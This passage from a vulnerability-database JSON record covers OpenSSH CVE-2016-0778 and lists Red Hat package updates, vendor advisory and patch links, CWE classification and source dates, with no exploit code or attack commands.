7):\n\nSource:\nopenssh-6.6.1p1-23.el7_2.src.rpm\n\nppc64:\nopenssh-6.6.1p1-23.el7_2.ppc64.rpm\nopenssh-askpass-6.6.1p1-23.el7_2.ppc64.rpm\nopenssh-clients-6.6.1p1-23.el7_2.ppc64.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.ppc64.rpm\nopenssh-keycat-6.6.1p1-23.el7_2.ppc64.rpm\nopenssh-server-6.6.1p1-23.el7_2.ppc64.rpm\n\nppc64le:\nopenssh-6.6.1p1-23.el7_2.ppc64le.rpm\nopenssh-askpass-6.6.1p1-23.el7_2.ppc64le.rpm\nopenssh-clients-6.6.1p1-23.el7_2.ppc64le.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.ppc64le.rpm\nopenssh-keycat-6.6.1p1-23.el7_2.ppc64le.rpm\nopenssh-server-6.6.1p1-23.el7_2.ppc64le.rpm\n\ns390x:\nopenssh-6.6.1p1-23.el7_2.s390x.rpm\nopenssh-askpass-6.6.1p1-23.el7_2.s390x.rpm\nopenssh-clients-6.6.1p1-23.el7_2.s390x.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.s390x.rpm\nopenssh-keycat-6.6.1p1-23.el7_2.s390x.rpm\nopenssh-server-6.6.1p1-23.el7_2.s390x.rpm\n\nx86_64:\nopenssh-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-askpass-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-clients-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-keycat-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-server-6.6.1p1-23.el7_2.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nppc64:\nopenssh-debuginfo-6.6.1p1-23.el7_2.ppc.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.ppc64.rpm\nopenssh-ldap-6.6.1p1-23.el7_2.ppc64.rpm\nopenssh-server-sysvinit-6.6.1p1-23.el7_2.ppc64.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.ppc.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.ppc64.rpm\n\nppc64le:\nopenssh-debuginfo-6.6.1p1-23.el7_2.ppc64le.rpm\nopenssh-ldap-6.6.1p1-23.el7_2.ppc64le.rpm\nopenssh-server-sysvinit-6.6.1p1-23.el7_2.ppc64le.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.ppc64le.rpm\n\ns390x:\nopenssh-debuginfo-6.6.1p1-23.el7_2.s390.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.s390x.rpm\nopenssh-ldap-6.6.1p1-23.el7_2.s390x.rpm\nopenssh-server-sysvinit-6.6.1p1-23.el7_2.s390x.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.s390.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.s390x.rpm\n\nx86_64:\nopenssh-debuginfo-6.6.1p1-23.el7_2.i686.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-ldap-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-server-sysvinit-6.6.1p1-23.el7_2.x86_64.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.i686.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nopenssh-6.6.1p1-23.el7_2.src.rpm\n\nx86_64:\nopenssh-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-askpass-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-clients-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-keycat-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-server-6.6.1p1-23.el7_2.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\nopenssh-debuginfo-6.6.1p1-23.el7_2.i686.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-ldap-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-server-sysvinit-6.6.1p1-23.el7_2.x86_64.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.i686.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2016-0777\nhttps://access.redhat.com/security/cve/CVE-2016-0778\nhttps://access.redhat.com/security/updates/classification/#moderate\nhttps://access.redhat.com/articles/2123781\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2016 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFWmAWQXlSAg2UNWIIRAh17AJ9SiT1MA1YtOA6ctMp9jIo4e9XrFwCgkbmo\nnXgYWs8cZcyoTRVoriTGHQo=\n=1sk9\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n", "sources": [ { "db": "NVD", "id": "CVE-2016-0778" }, { "db": "CERT/CC", "id": "VU#456088" }, { "db": "JVNDB", "id": "JVNDB-2016-001117" }, { "db": "BID", "id": "80698" }, { "db": "VULHUB", "id": "VHN-88288" }, { "db": "VULMON", "id": "CVE-2016-0778" }, { "db": "PACKETSTORM", "id": "135250" }, { "db": "PACKETSTORM", "id": "135273" }, { "db": "PACKETSTORM", "id": "135259" }, { "db": "PACKETSTORM", "id": "136346" }, { "db": "PACKETSTORM", "id": "135283" }, { "db": "PACKETSTORM", "id": "135263" } ], "trust": 3.33 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2016-0778", "trust": 4.3 }, { "db": "BID", "id": "80698", "trust": 2.1 }, { "db": "JUNIPER", "id": "JSA10734", "trust": 2.1 }, { "db": "CERT/CC", "id": "VU#456088", "trust": 2.0 }, { "db": "PACKETSTORM", "id": "135273", "trust": 1.9 }, { "db": "SECTRACK", "id": "1034671", "trust": 1.8 }, { "db": "OPENWALL", "id": "OSS-SECURITY/2016/01/14/7", "trust": 1.8 }, { "db": "SIEMENS", "id": "SSA-412672", "trust": 1.8 }, { "db": "JVN", "id": "JVNVU95595627", "trust": 0.8 }, { "db": "JVN", "id": "JVNVU97668313", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2016-001117", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201601-250", "trust": 0.7 }, { "db": "JUNIPER", "id": "JSA10774", "trust": 0.3 }, { "db": "SEEBUG", "id": "SSVID-90447", "trust": 0.1 }, { "db": "VULHUB", "id": "VHN-88288", "trust": 0.1 }, { "db": "ICS CERT", "id": "ICSA-22-349-21", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2016-0778", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "135250", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "135259", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "136346", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "135283", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "135263", "trust": 0.1 } ], "sources": [ { "db": "CERT/CC", "id": "VU#456088" }, { "db": "VULHUB", "id": "VHN-88288" }, { "db": "VULMON", "id": "CVE-2016-0778" }, { "db": "BID", "id": "80698" }, { "db": "JVNDB", "id": "JVNDB-2016-001117" }, { "db": "PACKETSTORM", "id": "135250" }, { "db": "PACKETSTORM", "id": "135273" }, { "db": "PACKETSTORM", "id": "135259" }, { "db": "PACKETSTORM", "id": "136346" }, { "db": "PACKETSTORM", "id": "135283" }, { "db": "PACKETSTORM", "id": "135263" }, { "db": "CNNVD", "id": "CNNVD-201601-250" }, { "db": "NVD", "id": "CVE-2016-0778" } ] }, "id": "VAR-201601-0030", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VULHUB", "id": "VHN-88288" } ], "trust": 0.01 }, "last_update_date": "2024-07-23T20:39:22.908000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "APPLE-SA-2016-03-21-5 OS X El Capitan 10.11.4 and Security Update 2016-002", "trust": 0.8, "url": "http://lists.apple.com/archives/security-announce/2016/mar/msg00004.html" }, { "title": "HT206167", "trust": 0.8, "url": "https://support.apple.com/en-us/ht206167" }, { "title": "HT206167", "trust": 0.8, "url": "https://support.apple.com/ja-jp/ht206167" }, { "title": "HPSBGN03638", "trust": 0.8, "url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05247375" }, { "title": "AXSA:2016-037:01", "trust": 0.8, "url": "https://tsn.miraclelinux.com/ja/node/6397" }, { "title": "release-7.1p2", "trust": 0.8, "url": "http://www.openssh.com/txt/release-7.1p2" }, { "title": "Oracle Solaris Third Party Bulletin - October 2015", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/bulletinoct2015-2511968.html" }, { "title": "Oracle Linux Bulletin - January 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinjan2016-2867209.html" }, { "title": "UTM Up2Date 9.354 released", "trust": 0.8, "url": "https://blogs.sophos.com/2016/02/17/utm-up2date-9-354-released/" }, { "title": "UTM Up2Date 9.319 released", "trust": 0.8, "url": "https://blogs.sophos.com/2016/02/29/utm-up2date-9-319-released/" }, { "title": "OpenSSH Remediation measures for denial of service vulnerabilities", "trust": 0.6, "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=59597" }, { "title": "The Register", "trust": 0.2, "url": "https://www.theregister.co.uk/2016/05/05/juniper_patches_opensshs_roaming_bug_in_junos_os/" }, { "title": "The Register", "trust": 0.2, "url": "https://www.theregister.co.uk/2016/01/14/openssh_is_wide_open_to_key_theft_thanks_to_roaming_flaw/" }, { "title": "Ubuntu Security Notice: openssh vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2869-1" }, { "title": "Debian Security Advisories: DSA-3446-1 openssh -- security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=ae57bf01ef5062fb12be694f4a95eb69" }, { "title": "Debian CVElist Bug Report Logs: openssh-client: CVE-2016-0777", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=5382b188b84b87a2670c7f1e661e15b8" }, { "title": "Amazon Linux AMI: ALAS-2016-638", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2016-638" }, { "title": "Red Hat: CVE-2016-0778", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2016-0778" }, { "title": "Symantec Security Advisories: SA109 : Multiple OpenSSH Vulnerabilities (January 2016)", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=ef164fe57ef1d1217ba2dc664dcecce2" }, { "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - January 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=8ad80411af3e936eb2998df70506cc71" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - October 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=92308e3c4d305e91c2eba8c9c6835e83" }, { "title": "puppet-module-ssh", "trust": 0.1, "url": "https://github.com/ghoneycutt/puppet-module-ssh " }, { "title": "fabric2", "trust": 0.1, "url": "https://github.com/winstonn/fabric2 " }, { "title": "", "trust": 0.1, "url": "https://github.com/cpcloudnl/ssh-config " }, { "title": "Linux_command_crash_course", "trust": 0.1, "url": "https://github.com/akshayprasad/linux_command_crash_course " }, { "title": "nmap", "trust": 0.1, "url": "https://github.com/project7io/nmap " }, { "title": "DC-2-Vulnhub-Walkthrough", "trust": 0.1, "url": "https://github.com/vshaliii/dc-2-vulnhub-walkthrough " }, { "title": "DC-1-Vulnhub-Walkthrough", "trust": 0.1, "url": "https://github.com/vshaliii/dc-1-vulnhub-walkthrough " }, { "title": "satellite-host-cve", "trust": 0.1, "url": "https://github.com/redhatsatellite/satellite-host-cve " } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-0778" }, { "db": "JVNDB", "id": "JVNDB-2016-001117" }, { "db": "CNNVD", "id": "CNNVD-201601-250" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-119", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-88288" }, { "db": "JVNDB", "id": "JVNDB-2016-001117" }, { "db": "NVD", "id": "CVE-2016-0778" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.9, "url": "http://www.openssh.com/txt/release-7.1p2" }, { "trust": 2.4, "url": "http://www.securityfocus.com/bid/80698" }, { "trust": 2.4, "url": "http://www.debian.org/security/2016/dsa-3446" }, { "trust": 2.4, "url": "http://packetstormsecurity.com/files/135273/qualys-security-advisory-openssh-overflow-leak.html" }, { "trust": 2.1, "url": "http://www.oracle.com/technetwork/topics/security/bulletinoct2015-2511968.html" }, { "trust": 2.1, "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinjan2016-2867209.html" }, { "trust": 1.9, "url": "https://www.qualys.com/2016/01/14/cve-2016-0777-cve-2016-0778/openssh-cve-2016-0777-cve-2016-0778.txt" }, { "trust": 1.9, "url": "https://security.gentoo.org/glsa/201601-01" }, { "trust": 1.9, "url": "http://www.ubuntu.com/usn/usn-2869-1" }, { "trust": 1.8, "url": "http://lists.apple.com/archives/security-announce/2016/mar/msg00004.html" }, { "trust": 1.8, "url": "http://www.securityfocus.com/archive/1/537295/100/0/threaded" }, { "trust": 1.8, "url": "https://blogs.sophos.com/2016/02/17/utm-up2date-9-354-released/" }, { "trust": 1.8, "url": "https://blogs.sophos.com/2016/02/29/utm-up2date-9-319-released/" }, { "trust": 1.8, "url": "https://bto.bluecoat.com/security-advisory/sa109" }, { "trust": 1.8, "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-412672.pdf" }, { "trust": 1.8, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05247375" }, { "trust": 1.8, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05356388" }, { "trust": 1.8, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05385680" }, { "trust": 1.8, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05390722" }, { "trust": 1.8, "url": "https://support.apple.com/ht206167" }, { "trust": 1.8, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-february/176516.html" }, { "trust": 1.8, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-january/176349.html" }, { "trust": 1.8, "url": "http://seclists.org/fulldisclosure/2016/jan/44" }, { "trust": 1.8, "url": "http://www.openwall.com/lists/oss-security/2016/01/14/7" }, { "trust": 1.8, "url": "http://www.securitytracker.com/id/1034671" }, { "trust": 1.8, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00006.html" }, { "trust": 1.8, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00007.html" }, { "trust": 1.8, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00008.html" }, { "trust": 1.8, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00009.html" }, { "trust": 1.8, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00013.html" }, { "trust": 1.8, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00014.html" }, { "trust": 1.7, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10734" }, { "trust": 1.6, "url": "http://undeadly.org/cgi?action=article\u0026sid=20160114142733" }, { "trust": 1.2, "url": "https://www.kb.cert.org/vuls/id/456088" }, { "trust": 1.1, "url": "http://ftp.openbsd.org/pub/openbsd/patches/5.7/common/022_ssh.patch.sig" }, { "trust": 1.1, "url": "http://www.ubuntu.com/usn/usn-2869-1/" }, { "trust": 0.9, "url": "https://access.redhat.com/articles/2123781" }, { "trust": 0.8, "url": "https://github.com/openssh/openssh-portable/blob/8408218c1ca88cb17d15278174a24a94a6f65fe1/roaming_client.c#l70" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-0777" }, { "trust": 0.8, "url": "https://isc.sans.edu/forums/diary/openssh+71p2+released+with+security+fix+for+cve20160777/20613/" }, { "trust": 0.8, "url": "https://security-tracker.debian.org/tracker/cve-2016-0778" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-0778" }, { "trust": 0.8, "url": "http://jvn.jp/vu/jvnvu95595627/index.html" }, { "trust": 0.8, "url": "http://jvn.jp/vu/jvnvu97668313" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-0778" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0778" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0777" }, { "trust": 0.4, "url": "https://rhn.redhat.com/errata/rhsa-2016-0043.html" }, { "trust": 0.3, "url": "http://www.openssh.com" }, { "trust": 0.3, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10734\u0026cat=sirt_1\u0026actp=list" }, { "trust": 0.3, "url": "https://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10774\u0026actp=rss" }, { "trust": 0.3, "url": "http://ftp.openbsd.org/pub/openbsd/patches/5.8/common/010_ssh.patch.sig" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05247375" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1023271" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1023319" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5099309" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1021138" }, { "trust": 0.3, "url": "http://aix.software.ibm.com/aix/efixes/security/openssh_advisory7.asc" }, { "trust": 0.3, "url": "https://securityadvisories.paloaltonetworks.com/home/detail/44" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21978487" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg2c1000044" }, { "trust": 0.3, "url": "https://gtacknowledge.extremenetworks.com/articles/vulnerability_notice/vn-2016-001-openssh" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1021109" }, { "trust": 0.1, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026amp;id=jsa10734" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/119.html" }, { "trust": 0.1, "url": "https://github.com/ghoneycutt/puppet-module-ssh" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-349-21" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssh/1:6.7p1-5ubuntu1.4" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssh/1:6.6p1-2ubuntu2.4" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssh/1:6.9p1-2ubuntu0.1" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssh/1:5.9p1-5ubuntu1.8" }, { "trust": 0.1, "url": "https://sourceware.org/ml/libc-alpha/2014-12/threads.html#00506" }, { "trust": 0.1, "url": "https://www.securecoding.cert.org/confluence/display/c/msc06-c.+beware+of+compiler+optimizations" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/14.html" }, { "trust": 0.1, "url": "https://www.securecoding.cert.org/confluence/display/c/mem06-c.+ensure+that+sensitive+data+is+not+written+out+to+disk" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/244.html" }, { "trust": 0.1, "url": "https://www.securecoding.cert.org/confluence/display/c/mem03-c.+clear+sensitive+information+stored+in+reusable+resources" }, { "trust": 0.1, "url": "https://www.debian.org/security/" }, { "trust": 0.1, "url": "https://www.debian.org/security/faq" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7551" }, { "trust": 0.1, "url": "https://support.apple.com/kb/ht201222" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8659" }, { "trust": 0.1, "url": "https://gpgtools.org" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8035" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8472" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1819" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3195" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7499" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0801" }, { "trust": 0.1, "url": "http://www.apple.com/support/downloads/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8242" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8126" }, { "trust": 0.1, "url": "https://support.apple.com/kb/ht206171" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1732" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5312" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7942" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7500" }, { "trust": 0.1, "url": "https://www.apple.com/support/security/pgp/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9495" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1734" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1740" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5334" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1733" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1736" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1735" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5333" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0802" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1738" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1737" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0973" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-0777" }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-sa/2.5" }, { "trust": 0.1, "url": "https://security.gentoo.org/" }, { "trust": 0.1, "url": "https://bugs.gentoo.org." }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-0778" }, { "trust": 0.1, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.1, "url": "https://access.redhat.com/security/updates/classification/#moderate" }, { "trust": 0.1, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.1, "url": "https://access.redhat.com/security/team/key/" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-0777" }, { "trust": 0.1, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-0778" }, { "trust": 0.1, "url": "https://access.redhat.com/security/team/contact/" } ], "sources": [ { "db": "CERT/CC", "id": "VU#456088" }, { "db": "VULHUB", "id": "VHN-88288" }, { "db": "VULMON", "id": "CVE-2016-0778" }, { "db": "BID", "id": "80698" }, { "db": "JVNDB", "id": "JVNDB-2016-001117" }, { "db": "PACKETSTORM", "id": "135250" }, { "db": "PACKETSTORM", "id": "135273" }, { "db": "PACKETSTORM", "id": "135259" }, { "db": "PACKETSTORM", "id": "136346" }, { "db": "PACKETSTORM", "id": "135283" }, { "db": "PACKETSTORM", "id": "135263" }, { "db": "CNNVD", "id": "CNNVD-201601-250" }, { "db": "NVD", "id": "CVE-2016-0778" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CERT/CC", "id": "VU#456088" }, { "db": "VULHUB", "id": "VHN-88288" }, { "db": "VULMON", "id": "CVE-2016-0778" }, { "db": "BID", "id": "80698" }, { "db": "JVNDB", "id": "JVNDB-2016-001117" }, { "db": "PACKETSTORM", "id": "135250" }, { "db": "PACKETSTORM", "id": "135273" }, { "db": "PACKETSTORM", "id": "135259" }, { "db": "PACKETSTORM", "id": "136346" }, { "db": "PACKETSTORM", "id": "135283" }, { "db": "PACKETSTORM", "id": "135263" }, { "db": "CNNVD", "id": "CNNVD-201601-250" }, { "db": "NVD", "id": "CVE-2016-0778" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-01-14T00:00:00", "db": "CERT/CC", "id": "VU#456088" }, { "date": "2016-01-14T00:00:00", "db": "VULHUB", "id": "VHN-88288" }, { "date": "2016-01-14T00:00:00", "db": "VULMON", "id": "CVE-2016-0778" }, { "date": "2016-01-14T00:00:00", "db": "BID", "id": "80698" }, { "date": "2016-01-22T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-001117" }, { "date": "2016-01-14T17:27:54", "db": "PACKETSTORM", "id": "135250" }, { "date": "2016-01-15T02:09:54", "db": "PACKETSTORM", "id": "135273" }, { "date": "2016-01-15T00:03:14", "db": "PACKETSTORM", "id": "135259" }, { "date": "2016-03-22T15:18:02", "db": "PACKETSTORM", "id": "136346" }, { "date": "2016-01-18T04:26:08", "db": "PACKETSTORM", "id": "135283" }, { "date": "2016-01-15T00:04:21", "db": "PACKETSTORM", "id": "135263" }, { "date": "2016-01-15T00:00:00", "db": "CNNVD", "id": "CNNVD-201601-250" }, { "date": "2016-01-14T22:59:02.280000", "db": "NVD", "id": "CVE-2016-0778" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-01-20T00:00:00", "db": "CERT/CC", "id": "VU#456088" }, { "date": "2022-12-13T00:00:00", "db": "VULHUB", "id": "VHN-88288" }, { "date": "2022-12-13T00:00:00", "db": "VULMON", "id": "CVE-2016-0778" }, { "date": "2017-01-23T03:06:00", "db": "BID", "id": "80698" }, { "date": "2016-10-27T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-001117" }, { "date": "2022-12-14T00:00:00", "db": "CNNVD", "id": "CNNVD-201601-250" }, { "date": "2022-12-13T12:15:19.253000", "db": "NVD", "id": "CVE-2016-0778" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201601-250" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "OpenSSH Client contains a client information leak vulnerability and buffer overflow", "sources": [ { "db": "CERT/CC", "id": "VU#456088" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "buffer error", "sources": [ { "db": "CNNVD", "id": "CNNVD-201601-250" } ], "trust": 0.6 } }
var-201201-0312
Vulnerability from variot
